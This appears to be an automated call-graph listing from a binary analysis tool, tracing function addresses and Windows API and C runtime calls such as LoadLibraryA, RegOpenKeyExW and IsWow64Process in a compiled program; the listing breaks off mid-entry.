22 API calls 95354->95357 95356 342d02 95505 303084 22 API calls 95356->95505 95359 302f12 95357->95359 95458 30a81b 41 API calls 95359->95458 95360 342d1e 95362 303a5a 24 API calls 95360->95362 95363 342d44 95362->95363 95506 303084 22 API calls 95363->95506 95364 302f21 95367 30a961 22 API calls 95364->95367 95366 342d50 95368 30a8c7 22 API calls 95366->95368 95369 302f3f 95367->95369 95371 342d5e 95368->95371 95459 303084 22 API calls 95369->95459 95507 303084 22 API calls 95371->95507 95372 302f4b 95460 324a28 40 API calls 3 library calls 95372->95460 95375 342d6d 95378 30a8c7 22 API calls 95375->95378 95376 302f59 95376->95351 95377 302f63 95376->95377 95461 324a28 40 API calls 3 library calls 95377->95461 95380 342d83 95378->95380 95508 303084 22 API calls 95380->95508 95381 302f6e 95381->95356 95383 302f78 95381->95383 95462 324a28 40 API calls 3 library calls 95383->95462 95385 302f83 95385->95360 95387 302f8d 95385->95387 95386 342d90 95463 324a28 40 API calls 3 library calls 95387->95463 95389 302f98 95390 302fdc 95389->95390 95464 303084 22 API calls 95389->95464 95390->95375 95391 302fe8 95390->95391 95391->95386 95466 3063eb 22 API calls 95391->95466 95393 302fbf 95395 30a8c7 22 API calls 95393->95395 95397 302fcd 95395->95397 95396 302ff8 95467 306a50 22 API calls 95396->95467 95465 303084 22 API calls 95397->95465 95400 303006 95468 3070b0 23 API calls 95400->95468 95404 303021 95405 303065 95404->95405 95469 306f88 22 API calls 95404->95469 95470 3070b0 23 API calls 95404->95470 95471 303084 22 API calls 95404->95471 95408 304af0 __wsopen_s 95407->95408 95409 306b57 22 API calls 95408->95409 95410 304b22 95408->95410 95409->95410 95419 304b58 95410->95419 95509 304c6d 95410->95509 95412 309cb3 22 API calls 95414 304c52 95412->95414 95413 309cb3 22 API calls 95413->95419 95415 30515f 22 API calls 95414->95415 95417 304c5e 95415->95417 95417->95332 95418 304c29 95418->95412 95418->95417 95419->95413 95419->95418 95420 304c6d 22 API calls 95419->95420 95512 30515f 95419->95512 95420->95419 95518 341f50 95421->95518 95424 309cb3 22 API calls 95425 303a8d 95424->95425 95520 303aa2 95425->95520 95427 303a97 95427->95334 95429 309cc2 _wcslen 95428->95429 95430 31fe0b 22 API calls 95429->95430 95431 309cea __fread_nolock 95430->95431 95432 31fddb 22 API calls 95431->95432 95433 302e8c 95432->95433 95434 304ecb 95433->95434 95540 304e90 LoadLibraryA 95434->95540 95439 304ef6 LoadLibraryExW 95548 304e59 LoadLibraryA 95439->95548 95440 343ccf 95442 304f39 68 API calls 95440->95442 95444 343cd6 95442->95444 95445 304e59 3 API calls 95444->95445 95447 343cde 95445->95447 95570 3050f5 95447->95570 95448 304f20 95448->95447 95449 304f2c 95448->95449 95451 304f39 68 API calls 95449->95451 95453 302ea5 95451->95453 95453->95339 95453->95340 95455 343d05 95456->95349 95457->95354 95458->95364 95459->95372 95460->95376 95461->95381 95462->95385 95463->95389 95464->95393 95465->95390 95466->95396 95467->95400 95468->95404 95469->95404 95470->95404 95471->95404 95473 372d15 95472->95473 95474 30511f 64 API calls 95473->95474 95475 372d29 95474->95475 95720 372e66 95475->95720 95478 3050f5 40 API calls 95479 372d56 95478->95479 95480 3050f5 40 API calls 95479->95480 95481 372d66 95480->95481 95482 3050f5 40 API calls 95481->95482 95483 372d81 95482->95483 95484 3050f5 40 API calls 95483->95484 95485 372d9c 95484->95485 95486 30511f 64 API calls 95485->95486 95487 372db3 95486->95487 95488 32ea0c ___std_exception_copy 21 API calls 95487->95488 95489 372dba 95488->95489 95490 32ea0c ___std_exception_copy 21 API calls 95489->95490 95491 372dc4 95490->95491 95492 3050f5 40 API calls 95491->95492 95493 372dd8 95492->95493 95494 3728fe 27 API calls 95493->95494 95495 372dee 95494->95495 95497 372d3f 95495->95497 95726 3722ce 95495->95726 95497->95342 95499 304f43 95498->95499 95500 304f4a 95498->95500 95501 32e678 67 API calls 95499->95501 95502 304f59 95500->95502 95503 304f6a FreeLibrary 95500->95503 95501->95500 95502->95343 95503->95502 95504->95356 95505->95360 95506->95366 95507->95375 95508->95386 95510 30aec9 22 API calls 95509->95510 95511 304c78 95510->95511 95511->95410 95513 30516e 95512->95513 95517 30518f __fread_nolock 95512->95517 95515 31fe0b 22 API calls 95513->95515 95514 31fddb 22 API calls 95516 3051a2 95514->95516 95515->95517 95516->95419 95517->95514 95519 303a67 GetModuleFileNameW 95518->95519 95519->95424 95521 341f50 __wsopen_s 95520->95521 95522 303aaf GetFullPathNameW 95521->95522 95523 303ae9 95522->95523 95524 303ace 95522->95524 95534 30a6c3 95523->95534 95525 306b57 22 API calls 95524->95525 95527 303ada 95525->95527 95530 3037a0 95527->95530 95531 3037ae 95530->95531 95532 3093b2 22 API calls 95531->95532 95533 3037c2 95532->95533 95533->95427 95535 30a6d0 95534->95535 95536 30a6dd 95534->95536 95535->95527 95537 31fddb 22 API calls 95536->95537 95538 30a6e7 95537->95538 95539 31fe0b 22 API calls 95538->95539 95539->95535 95541 304ec6 95540->95541 95542 304ea8 GetProcAddress 95540->95542 95545 32e5eb 95541->95545 95543 304eb8 95542->95543 95543->95541 95544 304ebf FreeLibrary 95543->95544 95544->95541 95578 32e52a 95545->95578 95547 304eea 95547->95439 95547->95440 95549 304e8d 95548->95549 95550 304e6e GetProcAddress 95548->95550 95553 304f80 95549->95553 95551 304e7e 95550->95551 95551->95549 95552 304e86 FreeLibrary 95551->95552 95552->95549 95554 31fe0b 22 API calls 95553->95554 95555 304f95 95554->95555 95646 305722 95555->95646 95557 304fa1 __fread_nolock 95558 304fdc 95557->95558 95559 3050a5 95557->95559 95560 343d1d 95557->95560 95563 343d22 95558->95563 95564 3050f5 40 API calls 95558->95564 95569 30506e ISource 95558->95569 95655 30511f 95558->95655 95649 3042a2 CreateStreamOnHGlobal 95559->95649 95660 37304d 74 API calls 95560->95660 95565 30511f 64 API calls 95563->95565 95564->95558 95566 343d45 95565->95566 95567 3050f5 40 API calls 95566->95567 95567->95569 95569->95448 95571 343d70 95570->95571 95572 305107 95570->95572 95682 32e8c4 95572->95682 95575 3728fe 95703 37274e 95575->95703 95577 372919 95577->95455 95581 32e536 CallCatchBlock 95578->95581 95579 32e544 95603 32f2d9 20 API calls _abort 95579->95603 95581->95579 95583 32e574 95581->95583 95582 32e549 95604 3327ec 26 API calls _abort 95582->95604 95585 32e586 95583->95585 95586 32e579 95583->95586 95595 338061 95585->95595 95605 32f2d9 20 API calls _abort 95586->95605 95589 32e58f 95590 32e595 95589->95590 95592 32e5a2 95589->95592 95606 32f2d9 20 API calls _abort 95590->95606 95607 32e5d4 LeaveCriticalSection __fread_nolock 95592->95607 95594 32e554 __fread_nolock 95594->95547 95596 33806d CallCatchBlock 95595->95596 95608 332f5e EnterCriticalSection 95596->95608 95598 33807b 95609 3380fb 95598->95609 95602 3380ac __fread_nolock 95602->95589 95603->95582 95604->95594 95605->95594 95606->95594 95607->95594 95608->95598 95613 33811e 95609->95613 95610 338088 95622 3380b7 95610->95622 95611 338177 95627 334c7d 95611->95627 95613->95610 95613->95611 95625 32918d EnterCriticalSection 95613->95625 95626 3291a1 LeaveCriticalSection 95613->95626 95617 338189 95617->95610 95640 333405 11 API calls 2 library calls 95617->95640 95619 3381a8 95641 32918d EnterCriticalSection 95619->95641 95645 332fa6 LeaveCriticalSection 95622->95645 95624 3380be 95624->95602 95625->95613 95626->95613 95628 334c8a _abort 95627->95628 95629 334cca 95628->95629 95630 334cb5 RtlAllocateHeap 95628->95630 95642 324ead 7 API calls 2 library calls 95628->95642 95643 32f2d9 20 API calls _abort 95629->95643 95630->95628 95631 334cc8 95630->95631 95634 3329c8 95631->95634 95635 3329d3 RtlFreeHeap 95634->95635 95636 3329fc _free 95634->95636 95635->95636 95637 3329e8 95635->95637 95636->95617 95644 32f2d9 20 API calls _abort 95637->95644 95639 3329ee GetLastError 95639->95636 95640->95619 95641->95610 95642->95628 95643->95631 95644->95639 95645->95624 95647 31fddb 22 API calls 95646->95647 95648 305734 95647->95648 95648->95557 95650 3042bc FindResourceExW 95649->95650 95651 3042d9 95649->95651 95650->95651 95652 3435ba LoadResource 95650->95652 95651->95558 95652->95651 95653 3435cf SizeofResource 95652->95653 95653->95651 95654 3435e3 LockResource 95653->95654 95654->95651 95656 343d90 95655->95656 95657 30512e 95655->95657 95661 32ece3 95657->95661 95660->95563 95664 32eaaa 95661->95664 95663 30513c 95663->95558 95668 32eab6 CallCatchBlock 95664->95668 95665 32eac2 95677 32f2d9 20 API calls _abort 95665->95677 95667 32eae8 95679 32918d EnterCriticalSection 95667->95679 95668->95665 95668->95667 95669 32eac7 95678 3327ec 26 API calls _abort 95669->95678 95672 32eaf4 95680 32ec0a 62 API calls 2 library calls 95672->95680 95674 32eb08 95681 32eb27 LeaveCriticalSection __fread_nolock 95674->95681 95676 32ead2 __fread_nolock 95676->95663 95677->95669 95678->95676 95679->95672 95680->95674 95681->95676 95685 32e8e1 95682->95685 95684 305118 95684->95575 95686 32e8ed CallCatchBlock 95685->95686 95687 32e92d 95686->95687 95688 32e925 __fread_nolock 95686->95688 95692 32e900 ___scrt_fastfail 95686->95692 95700 32918d EnterCriticalSection 95687->95700 95688->95684 95691 32e937 95701 32e6f8 38 API calls 4 library calls 95691->95701 95698 32f2d9 20 API calls _abort 95692->95698 95693 32e91a 95699 3327ec 26 API calls _abort 95693->95699 95696 32e94e 95702 32e96c LeaveCriticalSection __fread_nolock 95696->95702 95698->95693 95699->95688 95700->95691 95701->95696 95702->95688 95706 32e4e8 95703->95706 95705 37275d 95705->95577 95709 32e469 95706->95709 95708 32e505 95708->95705 95710 32e478 95709->95710 95711 32e48c 95709->95711 95717 32f2d9 20 API calls _abort 95710->95717 95716 32e488 __alldvrm 95711->95716 95719 33333f 11 API calls 2 library calls 95711->95719 95714 32e47d 95718 3327ec 26 API calls _abort 95714->95718 95716->95708 95717->95714 95718->95716 95719->95716 95725 372e7a 95720->95725 95721 3050f5 40 API calls 95721->95725 95722 372d3b 95722->95478 95722->95497 95723 3728fe 27 API calls 95723->95725 95724 30511f 64 API calls 95724->95725 95725->95721 95725->95722 95725->95723 95725->95724 95727 3722d9 95726->95727 95729 3722e7 95726->95729 95728 32e5eb 29 API calls 95727->95728 95728->95729 95730 37232c 95729->95730 95731 32e5eb 29 API calls 95729->95731 95754 3722f0 95729->95754 95755 372557 40 API calls __fread_nolock 95730->95755 95732 372311 95731->95732 95732->95730 95734 37231a 95732->95734 95734->95754 95763 32e678 95734->95763 95735 372370 95736 372395 95735->95736 95737 372374 95735->95737 95756 372171 95736->95756 95740 372381 95737->95740 95742 32e678 67 API calls 95737->95742 95743 32e678 67 API calls 95740->95743 95740->95754 95741 37239d 95744 3723c3 95741->95744 95745 3723a3 95741->95745 95742->95740 95743->95754 95776 3723f3 74 API calls 95744->95776 95747 3723b0 95745->95747 95748 32e678 67 API calls 95745->95748 95749 32e678 67 API calls 95747->95749 95747->95754 95748->95747 95749->95754 95750 3723ca 95751 3723de 95750->95751 95752 32e678 67 API calls 95750->95752 95753 32e678 67 API calls 95751->95753 95751->95754 95752->95751 95753->95754 95754->95497 95755->95735 95757 32ea0c ___std_exception_copy 21 API calls 95756->95757 95758 37217f 95757->95758 95759 32ea0c ___std_exception_copy 21 API calls 95758->95759 95760 372190 95759->95760 95761 32ea0c ___std_exception_copy 21 API calls 95760->95761 95762 37219c 95761->95762 95762->95741 95764 32e684 CallCatchBlock 95763->95764 95765 32e695 95764->95765 95766 32e6aa 95764->95766 95794 32f2d9 20 API calls _abort 95765->95794 95773 32e6a5 __fread_nolock 95766->95773 95777 32918d EnterCriticalSection 95766->95777 95769 32e69a 95795 3327ec 26 API calls _abort 95769->95795 95771 32e6c6 95778 32e602 95771->95778 95773->95754 95774 32e6d1 95796 32e6ee LeaveCriticalSection __fread_nolock 95774->95796 95776->95750 95777->95771 95779 32e624 95778->95779 95780 32e60f 95778->95780 95786 32e61f 95779->95786 95797 32dc0b 95779->95797 95829 32f2d9 20 API calls _abort 95780->95829 95782 32e614 95830 3327ec 26 API calls _abort 95782->95830 95786->95774 95790 32e646 95814 33862f 95790->95814 95793 3329c8 _free 20 API calls 95793->95786 95794->95769 95795->95773 95796->95773 95798 32dc23 95797->95798 95800 32dc1f 95797->95800 95799 32d955 __fread_nolock 26 API calls 95798->95799 95798->95800 95801 32dc43 95799->95801 95803 334d7a 95800->95803 95831 3359be 62 API calls 6 library calls 95801->95831 95804 334d90 95803->95804 95805 32e640 95803->95805 95804->95805 95806 3329c8 _free 20 API calls 95804->95806 95807 32d955 95805->95807 95806->95805 95808 32d961 95807->95808 95809 32d976 95807->95809 95832 32f2d9 20 API calls _abort 95808->95832 95809->95790 95811 32d966 95833 3327ec 26 API calls _abort 95811->95833 95813 32d971 95813->95790 95815 338653 95814->95815 95816 33863e 95814->95816 95817 33868e 95815->95817 95821 33867a 95815->95821 95837 32f2c6 20 API calls _abort 95816->95837 95839 32f2c6 20 API calls _abort 95817->95839 95820 338643 95838 32f2d9 20 API calls _abort 95820->95838 95834 338607 95821->95834 95822 338693 95840 32f2d9 20 API calls _abort 95822->95840 95824 32e64c 95824->95786 95824->95793 95827 33869b 95841 3327ec 26 API calls _abort 95827->95841 95829->95782 95830->95786 95831->95800 95832->95811 95833->95813 95842 338585 95834->95842 95836 33862b 95836->95824 95837->95820 95838->95824 95839->95822 95840->95827 95841->95824 95843 338591 CallCatchBlock 95842->95843 95853 335147 EnterCriticalSection 95843->95853 95845 33859f 95846 3385d1 95845->95846 95847 3385c6 95845->95847 95869 32f2d9 20 API calls _abort 95846->95869 95854 3386ae 95847->95854 95850 3385cc 95870 3385fb LeaveCriticalSection __wsopen_s 95850->95870 95852 3385ee __fread_nolock 95852->95836 95853->95845 95871 3353c4 95854->95871 95856 3386c4 95884 335333 21 API calls 3 library calls 95856->95884 95857 3386be 95857->95856 95859 3386f6 95857->95859 95860 3353c4 __wsopen_s 26 API calls 95857->95860 95859->95856 95861 3353c4 __wsopen_s 26 API calls 95859->95861 95863 3386ed 95860->95863 95864 338702 CloseHandle 95861->95864 95862 33871c 95865 33873e 95862->95865 95885 32f2a3 20 API calls 2 library calls 95862->95885 95866 3353c4 __wsopen_s 26 API calls 95863->95866 95864->95856 95867 33870e GetLastError 95864->95867 95865->95850 95866->95859 95867->95856 95869->95850 95870->95852 95872 3353d1 95871->95872 95873 3353e6 95871->95873 95886 32f2c6 20 API calls _abort 95872->95886 95877 33540b 95873->95877 95888 32f2c6 20 API calls _abort 95873->95888 95876 3353d6 95887 32f2d9 20 API calls _abort 95876->95887 95877->95857 95878 335416 95889 32f2d9 20 API calls _abort 95878->95889 95881 3353de 95881->95857 95882 33541e 95890 3327ec 26 API calls _abort 95882->95890 95884->95862 95885->95865 95886->95876 95887->95881 95888->95878 95889->95882 95890->95881 95891 301098 95896 3042de 95891->95896 95895 3010a7 95897 30a961 22 API calls 95896->95897 95898 3042f5 GetVersionExW 95897->95898 95899 306b57 22 API calls 95898->95899 95900 304342 95899->95900 95901 3093b2 22 API calls 95900->95901 95905 304378 95900->95905 95902 30436c 95901->95902 95904 3037a0 22 API calls 95902->95904 95903 30441b GetCurrentProcess IsWow64Process 95906 304437 95903->95906 95904->95905 95905->95903 95907 3437df 95905->95907 95908 343824 GetSystemInfo 95906->95908 95909 30444f LoadLibraryA 95906->95909 95910 304460 GetProcAddress 95909->95910 95911 30449c GetSystemInfo 95909->95911 95910->95911 95912 304470 GetNativeSystemInfo 95910->95912 95913 304476 95911->95913 95912->95913 95914 30109d 95913->95914 95915 30447a FreeLibrary 95913->95915 95916 3200a3 29 API calls __onexit 95914->95916 95915->95914 95916->95895 95917 3203fb 95918 320407 CallCatchBlock 95917->95918 95946 31feb1 95918->95946 95920 32040e 95921 320561 95920->95921 95924 320438 95920->95924 95973 32083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 95921->95973 95923 320568 95974 324e52 28 API calls _abort 95923->95974 95935 320477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 95924->95935 95957 33247d 95924->95957 95926 32056e 95975 324e04 28 API calls _abort 95926->95975 95930 320576 95931 320457 95933 3204d8 95965 320959 95933->95965 95935->95933 95969 324e1a 38 API calls 2 library calls 95935->95969 95937 3204de 95938 3204f3 95937->95938 95970 320992 GetModuleHandleW 95938->95970 95940 3204fa 95940->95923 95941 3204fe 95940->95941 95942 320507 95941->95942 95971 324df5 28 API calls _abort 95941->95971 95972 320040 13 API calls 2 library calls 95942->95972 95945 32050f 95945->95931 95947 31feba 95946->95947 95976 320698 IsProcessorFeaturePresent 95947->95976 95949 31fec6 95977 322c94 10 API calls 3 library calls 95949->95977 95951 31fecb 95952 31fecf 95951->95952 95978 332317 95951->95978 95952->95920 95955 31fee6 95955->95920 95959 332494 95957->95959 95958 320a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 95960 320451 95958->95960 95959->95958 95960->95931 95961 332421 95960->95961 95962 332450 95961->95962 95963 320a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 95962->95963 95964 332479 95963->95964 95964->95935 96037 322340 95965->96037 95968 32097f 95968->95937 95969->95933 95970->95940 95971->95942 95972->95945 95973->95923 95974->95926 95975->95930 95976->95949 95977->95951 95982 33d1f6 95978->95982 95981 322cbd 8 API calls 3 library calls 95981->95952 95985 33d213 95982->95985 95986 33d20f 95982->95986 95984 31fed8 95984->95955 95984->95981 95985->95986 95988 334bfb 95985->95988 96000 320a8c 95986->96000 95989 334c07 CallCatchBlock 95988->95989 96007 332f5e EnterCriticalSection 95989->96007 95991 334c0e 96008 3350af 95991->96008 95993 334c1d 95994 334c2c 95993->95994 96021 334a8f 29 API calls 95993->96021 96023 334c48 LeaveCriticalSection _abort 95994->96023 95997 334c27 96022 334b45 GetStdHandle GetFileType 95997->96022 95998 334c3d __fread_nolock 95998->95985 96001 320a97 IsProcessorFeaturePresent 96000->96001 96002 320a95 96000->96002 96004 320c5d 96001->96004 96002->95984 96036 320c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 96004->96036 96006 320d40 96006->95984 96007->95991 96009 3350bb CallCatchBlock 96008->96009 96010 3350c8 96009->96010 96011 3350df 96009->96011 96032 32f2d9 20 API calls _abort 96010->96032 96024 332f5e EnterCriticalSection 96011->96024 96014 3350cd 96033 3327ec 26 API calls _abort 96014->96033 96016 3350d7 __fread_nolock 96016->95993 96017 335117 96034 33513e LeaveCriticalSection _abort 96017->96034 96018 3350eb 96018->96017 96025 335000 96018->96025 96021->95997 96022->95994 96023->95998 96024->96018 96026 334c7d _abort 20 API calls 96025->96026 96031 335012 96026->96031 96027 33501f 96028 3329c8 _free 20 API calls 96027->96028 96030 335071 96028->96030 96030->96018 96031->96027 96035 333405 11 API calls 2 library calls 96031->96035 96032->96014 96033->96016 96034->96016 96035->96031 96036->96006 96038 32096c GetStartupInfoW 96037->96038 96038->95968 96039 30105b 96044 30344d 96039->96044 96041 30106a 96075 3200a3 29 API calls __onexit 96041->96075 96043 301074 96045 30345d __wsopen_s 96044->96045 96046 30a961 22 API calls 96045->96046 96047 303513 96046->96047 96048 303a5a 24 API calls 96047->96048 96049 30351c 96048->96049 96076 303357 96049->96076 96052 3033c6 22 API calls 96053 303535 96052->96053 96054 30515f 22 API calls 96053->96054 96055 303544 96054->96055 96056 30a961 22 API calls 96055->96056 96057 30354d 96056->96057 96058 30a6c3 22 API calls 96057->96058 96059 303556 RegOpenKeyExW 96058->96059 96060 343176 RegQueryValueExW 96059->96060 96064 303578 96059->96064 96061 343193 96060->96061 96062 34320c RegCloseKey 96060->96062 96063 31fe0b 22 API calls 96061->96063 96062->96064 96074 34321e _wcslen 96062->96074 96065 3431ac 96063->96065 96064->96041 96066 305722 22 API calls 96065->96066 96067 3431b7 RegQueryValueExW 96066->96067 96069 3431d4 96067->96069 96071 3431ee ISource 96067->96071 96068 304c6d 22 API calls 96068->96074 96070 306b57 22 API calls 96069->96070 96070->96071 96071->96062 96072 309cb3 22 API calls 96072->96074 96073 30515f 22 API calls 96073->96074 96074->96064 96074->96068 96074->96072 96074->96073 96075->96043 96077 341f50 __wsopen_s 96076->96077 96078 303364 GetFullPathNameW 96077->96078 96079 303386 96078->96079 96080 306b57 22 API calls 96079->96080 96081 3033a4 96080->96081 96081->96052 96082 30f7bf 96083 30f7d3 96082->96083 96084 30fcb6 96082->96084 96086 30fcc2 96083->96086 96087 31fddb 22 API calls 96083->96087 96175 30aceb 23 API calls ISource 96084->96175 96176 30aceb 23 API calls ISource 96086->96176 96089 30f7e5 96087->96089 96089->96086 96090 30fd3d 96089->96090 96091 30f83e 96089->96091 96177 371155 22 API calls 96090->96177 96116 30ed9d ISource 96091->96116 96117 311310 96091->96117 96094 31fddb 22 API calls 96114 30ec76 ISource 96094->96114 96095 30fef7 96103 30a8c7 22 API calls 96095->96103 96095->96116 96098 354b0b 96179 37359c 82 API calls __wsopen_s 96098->96179 96099 30a8c7 22 API calls 96099->96114 96100 354600 96105 30a8c7 22 API calls 96100->96105 96100->96116 96103->96116 96105->96116 96106 30fbe3 96108 354bdc 96106->96108 96115 30f3ae ISource 96106->96115 96106->96116 96107 30a961 22 API calls 96107->96114 96180 37359c 82 API calls __wsopen_s 96108->96180 96109 3200a3 29 API calls pre_c_initialization 96109->96114 96110 320242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96110->96114 96112 3201f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96112->96114 96113 354beb 96181 37359c 82 API calls __wsopen_s 96113->96181 96114->96094 96114->96095 96114->96098 96114->96099 96114->96100 96114->96106 96114->96107 96114->96109 96114->96110 96114->96112 96114->96113 96114->96115 96114->96116 96173 3101e0 207 API calls 2 library calls 96114->96173 96174 3106a0 41 API calls ISource 96114->96174 96115->96116 96178 37359c 82 API calls __wsopen_s 96115->96178 96118 3117b0 96117->96118 96119 311376 96117->96119 96295 320242 5 API calls __Init_thread_wait 96118->96295 96121 311390 96119->96121 96122 356331 96119->96122 96182 311940 96121->96182 96300 38709c 207 API calls 96122->96300 96124 3117ba 96127 3117fb 96124->96127 96130 309cb3 22 API calls 96124->96130 96126 35633d 96126->96114 96132 356346 96127->96132 96134 31182c 96127->96134 96129 311940 9 API calls 96131 3113b6 96129->96131 96138 3117d4 96130->96138 96131->96127 96133 3113ec 96131->96133 96301 37359c 82 API calls __wsopen_s 96132->96301 96133->96132 96139 311408 __fread_nolock 96133->96139 96297 30aceb 23 API calls ISource 96134->96297 96137 311839 96298 31d217 207 API calls 96137->96298 96296 3201f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96138->96296 96139->96137 96142 35636e 96139->96142 96149 31fddb 22 API calls 96139->96149 96150 31fe0b 22 API calls 96139->96150 96156 30ec40 207 API calls 96139->96156 96157 31152f 96139->96157 96158 3563b2 96139->96158 96161 356369 96139->96161 96302 37359c 82 API calls __wsopen_s 96142->96302 96143 311872 96299 31faeb 23 API calls 96143->96299 96145 3563d1 96304 385745 54 API calls _wcslen 96145->96304 96146 31153c 96148 311940 9 API calls 96146->96148 96151 311549 96148->96151 96149->96139 96150->96139 96152 311940 9 API calls 96151->96152 96153 3564fa 96151->96153 96159 311563 96152->96159 96153->96161 96305 37359c 82 API calls __wsopen_s 96153->96305 96156->96139 96157->96145 96157->96146 96303 37359c 82 API calls __wsopen_s 96158->96303 96159->96153 96162 30a8c7 22 API calls 96159->96162 96164 3115c7 ISource 96159->96164 96161->96114 96162->96164 96163 311940 9 API calls 96163->96164 96164->96143 96164->96153 96164->96161 96164->96163 96167 31167b ISource 96164->96167 96192 306246 96164->96192 96196 38958b 96164->96196 96199 37744a 96164->96199 96255 38e204 96164->96255 96291 3783da 96164->96291 96165 31171d 96165->96114 96167->96165 96294 31ce17 22 API calls ISource 96167->96294 96173->96114 96174->96114 96175->96086 96176->96090 96177->96116 96178->96116 96179->96116 96180->96113 96181->96116 96183 311981 96182->96183 96184 31195d 96182->96184 96306 320242 5 API calls __Init_thread_wait 96183->96306 96191 3113a0 96184->96191 96308 320242 5 API calls __Init_thread_wait 96184->96308 96186 31198b 96186->96184 96307 3201f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96186->96307 96188 318727 96188->96191 96309 3201f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96188->96309 96191->96129 96193 306250 96192->96193 96194 30625f 96192->96194 96193->96164 96194->96193 96195 306264 CloseHandle 96194->96195 96195->96193 96310 387f59 96196->96310 96198 38959b 96198->96164 96200 377474 96199->96200 96201 377469 96199->96201 96205 30a961 22 API calls 96200->96205 96231 377554 96200->96231 96438 30b567 39 API calls 96201->96438 96203 31fddb 22 API calls 96204 377587 96203->96204 96206 31fe0b 22 API calls 96204->96206 96207 377495 96205->96207 96208 377598 96206->96208 96209 30a961 22 API calls 96207->96209 96210 306246 CloseHandle 96208->96210 96211 37749e 96209->96211 96213 3775a3 96210->96213 96212 307510 53 API calls 96211->96212 96214 3774aa 96212->96214 96215 30a961 22 API calls 96213->96215 96439 30525f 22 API calls 96214->96439 96217 3775ab 96215->96217 96219 306246 CloseHandle 96217->96219 96218 3774bf 96220 306350 22 API calls 96218->96220 96221 3775b2 96219->96221 96222 3774f2 96220->96222 96223 307510 53 API calls 96221->96223 96224 37754a 96222->96224 96440 36d4ce lstrlenW GetFileAttributesW FindFirstFileW FindClose 96222->96440 96225 3775be 96223->96225 96442 30b567 39 API calls 96224->96442 96227 306246 CloseHandle 96225->96227 96230 3775c8 96227->96230 96229 377502 96229->96224 96232 377506 96229->96232 96430 305745 96230->96430 96231->96203 96253 3776a4 96231->96253 96234 309cb3 22 API calls 96232->96234 96236 377513 96234->96236 96441 36d2c1 26 API calls 96236->96441 96237 3776de GetLastError 96240 3776f7 96237->96240 96239 3775ea 96443 3053de 27 API calls ISource 96239->96443 96450 306216 CloseHandle ISource 96240->96450 96243 3775f8 96444 3053c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 96243->96444 96244 37751c 96244->96224 96246 377645 96247 31fddb 22 API calls 96246->96247 96249 377679 96247->96249 96248 3775ff 96248->96246 96445 36ccff 96248->96445 96251 30a961 22 API calls 96249->96251 96252 377686 96251->96252 96252->96253 96449 36417d 22 API calls __fread_nolock 96252->96449 96253->96164 96256 30a961 22 API calls 96255->96256 96257 38e21b 96256->96257 96258 307510 53 API calls 96257->96258 96259 38e22a 96258->96259 96260 306270 22 API calls 96259->96260 96261 38e23d 96260->96261 96262 307510 53 API calls 96261->96262 96263 38e24a 96262->96263 96264 38e262 96263->96264 96265 38e2c7 96263->96265 96472 30b567 39 API calls 96264->96472 96267 307510 53 API calls 96265->96267 96268 38e2cc 96267->96268 96269 38e2d9 96268->96269 96270 38e314 96268->96270 96475 309c6e 22 API calls 96269->96475 96274 38e32c 96270->96274 96476 30b567 39 API calls 96270->96476 96271 38e267 96271->96269 96273 38e280 96271->96273 96473 306d25 22 API calls __fread_nolock 96273->96473 96277 38e345 96274->96277 96477 30b567 39 API calls 96274->96477 96278 30a8c7 22 API calls 96277->96278 96281 38e35f 96278->96281 96279 38e28d 96282 306350 22 API calls 96279->96282 96453 3692c8 96281->96453 96284 38e29b 96282->96284 96474 306d25 22 API calls __fread_nolock 96284->96474 96286 38e2b4 96287 306350 22 API calls 96286->96287 96290 38e2c2 96287->96290 96288 38e2e6 96288->96164 96478 3062b5 22 API calls 96290->96478 96482 3798e3 96291->96482 96293 3783ea 96293->96164 96294->96167 96295->96124 96296->96127 96297->96137 96298->96143 96299->96143 96300->96126 96301->96161 96302->96161 96303->96161 96304->96159 96305->96161 96306->96186 96307->96184 96308->96188 96309->96191 96348 307510 96310->96348 96314 38844f 96412 388ee4 60 API calls 96314->96412 96317 388049 96319 307510 53 API calls 96317->96319 96327 387fd5 ISource 96317->96327 96335 388281 96317->96335 96403 36417d 22 API calls __fread_nolock 96317->96403 96404 38851d 42 API calls _strftime 96317->96404 96318 38845e 96320 38846a 96318->96320 96321 38828f 96318->96321 96319->96317 96320->96327 96384 387e86 96321->96384 96326 3882c8 96399 31fc70 96326->96399 96327->96198 96330 3882e8 96405 37359c 82 API calls __wsopen_s 96330->96405 96331 388302 96406 3063eb 22 API calls 96331->96406 96334 3882f3 GetCurrentProcess TerminateProcess 96334->96331 96335->96314 96335->96321 96336 388311 96407 306a50 22 API calls 96336->96407 96338 38832a 96347 388352 96338->96347 96408 3104f0 22 API calls 96338->96408 96339 3884c5 96339->96327 96344 3884d9 FreeLibrary 96339->96344 96341 388341 96409 388b7b 75 API calls 96341->96409 96344->96327 96347->96339 96410 3104f0 22 API calls 96347->96410 96411 30aceb 23 API calls ISource 96347->96411 96413 388b7b 75 API calls 96347->96413 96349 307525 96348->96349 96365 307522 96348->96365 96350 30755b 96349->96350 96351 30752d 96349->96351 96353 30756d 96350->96353 96360 3450f6 96350->96360 96362 34500f 96350->96362 96414 3251c6 26 API calls 96351->96414 96415 31fb21 51 API calls 96353->96415 96356 30753d 96359 31fddb 22 API calls 96356->96359 96357 34510e 96357->96357 96361 307547 96359->96361 96417 325183 26 API calls 96360->96417 96363 309cb3 22 API calls 96361->96363 96364 31fe0b 22 API calls 96362->96364 96370 345088 96362->96370 96363->96365 96366 345058 96364->96366 96365->96327 96371 388cd3 96365->96371 96367 31fddb 22 API calls 96366->96367 96368 34507f 96367->96368 96369 309cb3 22 API calls 96368->96369 96369->96370 96416 31fb21 51 API calls 96370->96416 96372 